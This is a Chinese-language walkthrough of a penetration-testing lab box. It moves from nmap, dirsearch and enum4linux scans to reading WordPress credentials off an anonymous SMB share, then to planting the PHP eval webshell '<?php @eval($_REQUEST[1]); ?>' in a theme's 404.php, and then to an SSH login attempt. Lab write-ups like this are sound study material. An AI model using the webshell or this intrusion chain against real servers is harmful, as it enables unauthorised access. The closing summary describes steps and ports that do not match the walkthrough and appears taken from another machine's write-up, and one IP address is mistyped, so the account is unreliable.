声明

好好学习，天天向上

搭建

使用virtualbox打开，网络和我的PRESIDENTIAL一样，是要vmware和virtualbox互连

渗透

存活扫描，发现目标

arp-scan -l

端口扫描

nmap -T4 -A 192.168.239.15 -p 1-65535 -oN nmap.A

有意思，开启端口不少

发现开启80，22，139，445，3306，6667

访问80

http://192.168.239.15

扫描目录

python3 dirsearch.py -u http://192.168.239.15

扫描结果

info.php
phpmyadmin
wordpress
wordpress/wp-admin
robots.txt

当然优点拿robots.txt开刀了

http://192.168.239.15/robots.txt

发现四个目录

/old/
/test/
/TR2/
/Backnode_files/

看了个寂寞，看看445吧，扫描445发现允许匿名访问

enum4linux 192.168.239.15

windows下，把共享添加到k盘

net use k: \\192.168.239.15\share$

查看一下wordpress的配置文件，看到数据库账号密码 Admin/TogieMYSQL12345^^

登入wordpress/wp-admin

http://192.168.239.15/wordpress/wp-admin
Admin
TogieMYSQL12345^^

老样子，编辑器主题编辑Editor写入一句话

404

<?php @eval($_REQUEST[1]); ?>

访问

http://192.168.239.15/wordpress/wp-content/themes/twentyfifteen/404.php?1=phpinfo();

菜刀连接

查看文件deets.txt，发现密码123456提示

查看home目录发现账户togie

ssh登录togie

ssh togie@193.168.239.15
123456

难受，我这里ssh连接失败，不知道大佬是怎么连上的，我这里只能获取www的权限

总结

1.信息收集

端口发现80和22

通过80，使用x-forwarded-for头，就可以看到web后台

扫描80的目录，看到一些空白的php文件，虽然前端是空白，后面如果可以查看php内容，这些就是重点查看对象

2.web权限

进入后台，添加用户后可以通过user_id越权查看所有的用户信息，这样就能组成社工字典

3.shell权限

利用前面的社工字典，对22进行爆破，爆破除了ssh账号

4.权限维持

使用ssh进行连接登录，发现flag

5.提权

查找80端口扫描出的配置文件，发现数据库root和密码，直接登录

查看sudo，发现php命令可以临时具备root，通过sudo php进行权限提升拿到flag